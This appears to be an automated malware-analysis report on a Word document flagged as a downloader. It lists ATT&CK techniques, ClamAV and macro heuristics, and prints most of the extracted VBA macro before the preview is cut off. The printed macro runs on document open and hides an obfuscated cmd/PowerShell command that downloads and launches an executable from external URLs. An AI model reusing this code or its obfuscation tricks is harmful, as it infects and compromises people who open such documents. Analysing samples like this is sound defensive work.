Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro that automatically executes upon opening the document. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Valyria-6922866-0' further supports its role as a downloader.
Heuristics (6)
- ClamAV: Doc.Downloader.Valyria-6922866-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-6922866-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6567 bytes | 27ee2830112938b3e1a17bdd0b637cc19311dcb72ecf7bb7b0c01444ce604732 |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "jjqAcCsVzOQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month CStr("8963" + "Clfi" + "80" + "wT")
Month CStr("3505" + "6218" + "zYdSBzMt" + "LOOI")
Month CStr("rBilkf" + "KBzLLRZvh")
Month CStr("z" + "s" + "vZl" + "JNvX")
Month CStr("t" + "9552" + "kI" + "CblR")
Month CStr("246654939" + "162023883")
Shell CStr(XTzFkzTaQF) + CStr(YSInciNiUI) + nqzkoaD + puAaMFVD + MwtEZIBhiND + CStr(wznREhFFbnsIm) + CStr(OvEPizMUNKPNdK), CStr(vbHide)
Month CStr("vkdZGp" + "cv" + "5660" + "504240444")
Month CStr("Fz" + "fkZRPajvSdrAZ" + "402395061" + "cWW")
Month CStr("2505" + "94812061")
End Sub
Attribute VB_Name = "nIrnOpdpo"
Function nqzkoaD()
On _
Error _
Resume _
Next
Month CStr("Aj" + "54807151")
qOVOlTzIR = Chr(17 + 5 + 12 + 13 + 52) + "md" + " /V/" + Chr(11 + 3 + 8 + 9 + 36) + Chr(5 + 1 + 3 + 4 + 21) + "^se^" + "t I^O^b" + "=^ ^ " + "^ ^ " + " " + "^ " + "^ ^ ^"
Month CStr("N" + "H")
Month CStr("ELI" + "3009" + "vjPKvzlstjn" + "Lq")
JjNRBZfUQQT = " ^ " + "}}" + "{^h" + Chr(17 + 5 + 12 + 13 + 52) + "^" + "ta" + Chr(17 + 5 + 12 + 13 + 52) + "^};k" + "a^" + "er^b" + ";I"
Month CStr("E" + "pp" + "sjtK" + "T")
Month CStr("Ha" + "8674")
csIiUiY = "S" + "w^$" + "^ m^e^" + "t^I^-" + "^e^kovn" + "^I" + ";)I" + "S^w" + "^$ ^," + "^j^T^W" + "$(^e^l^" + "iF"
Month CStr("505645656" + "9947" + "4981" + "mDY")
Month CStr("3245" + "1092" + "138671089" + "350050640")
Month CStr("95133085" + "8965")
Month CStr("M" + "N" + "ADSvCrfQlz" + "9394")
Month CStr("95195421" + "mXD")
NEcBta = "^dao^l" + "n" + "wo^D." + "^SN" + "u${yrt^" + "{)^p" + "TM^$^" + " ni j^" + "T" + "W$"
Month CStr("2376" + "cMHqbTWid" + "Ih" + "479946264")
woDbI = "(" + "h" + Chr(17 + 5 + 12 + 13 + 52) + "aer" + "^o^f;^" + "'^e^x^e" + "^.^'" + "+^z^D" + "a^$" + "^+'" + "\'+" + Chr(17 + 5 + 12 + 13 + 52)
Month CStr("8873" + "6002" + "448641095" + "FInRTiHWm")
Month CStr("L" + "JBr" + "4896" + "V")
Month CStr("vXHp" + "188594286" + "OwFvrjLliqDWn" + "Ow")
Month CStr("5816" + "j" + "bkjcKQ" + "XvNkNFD")
Month CStr("RPYw" + "oWtkB" + "420247437" + "oY")
cUaujUPqFAi = "^i^" + "lb^" + "u^" + "p^:v" + "ne^$^"
Month CStr("ak" + "232908972" + "s" + "20714442")
Month CStr("u" + "Jrji" + "Rduw" + "nfH")
bzGEwzd = "=^I^S^" + "w^" + "$;'" + "9^3^2" + "'"
Month CStr("lff" + "znMCjZlvC")
Month CStr("8264" + "408298511" + "3686" + "b")
YlzhZQzjWk = " ^= " + "^" + "zDa$^;)" + "'^@" + "^" + "'" + "(ti" + "lp^S" + "."
Month CStr("332659622" + "VZK")
MjjNKo = "'f" + "TL^" + "j89W" + "k/^ln^" + ".e" + "l^ba" + Chr(17 + 5 + 12 + 13 + 52) + "re" + "si" + "r/" + "/^:^p^" + "tth@^4P" + "F^S^2" + "t0^0^" + "4"
nqzkoaD = qOVOlTzIR + JjNRBZfUQQT + csIiUiY + NEcBta + woDbI + cUaujUPqFAi + bzGEwzd + YlzhZQzjWk + MjjNKo
Month CStr("rcpu" + "15619119")
Month CStr("7574" + "7465" + "2313" + "302756700")
Month CStr("Tt" + "jnU" + "s" + "1111")
Month CStr("6975" + "XIQDHjm" + "zwZacbrdfipiZd" + "6794")
Month CStr("6561" + "301349976")
End Function
Function puAaMFVD()
On _
Error _
Resume _
Next
Month CStr("6054" + "zkNXCK")
Month CStr("103129436" + "Ur" + "lYiXaliFBEOzH" + "kN")
Month CStr("nHiZXCn" + "507228431")
Month CStr("jjNSaIomEJr" + "A")
iiWuW = "o/" + "^e^" + "p.s^l" + "^a^tiyi" + "d//^:"
Month CStr("jVGh" + "VXvm")
ABiRaNotYN = "p^tt^" + "h" + "^@K^H" + "k^S^S6" + "^Y" + "/^mo" + Chr(17 + 5 + 12 + 13 + 52) + ".^" + "a^u^h" + "^jn^" + "a" + "uy"
Month CStr("2862" + "XkFls")
Month CStr("1641" + "2262" + "jdFIUAbWohUw" + "8991")
Month CStr("393151650" + "q")
Month CStr("Drn" + "4088")
Month CStr("5982" + "KOZjvX" + "8100567" + "4682")
QCdlXVTvwc = ".w" + "w^w//^" + ":p^tth@" + Chr(11 + 3 + 8 + 9 + 36) + "V" + "^m" + "w^" + "O" + "^0^Z/m" + "^o" +
... (truncated)
```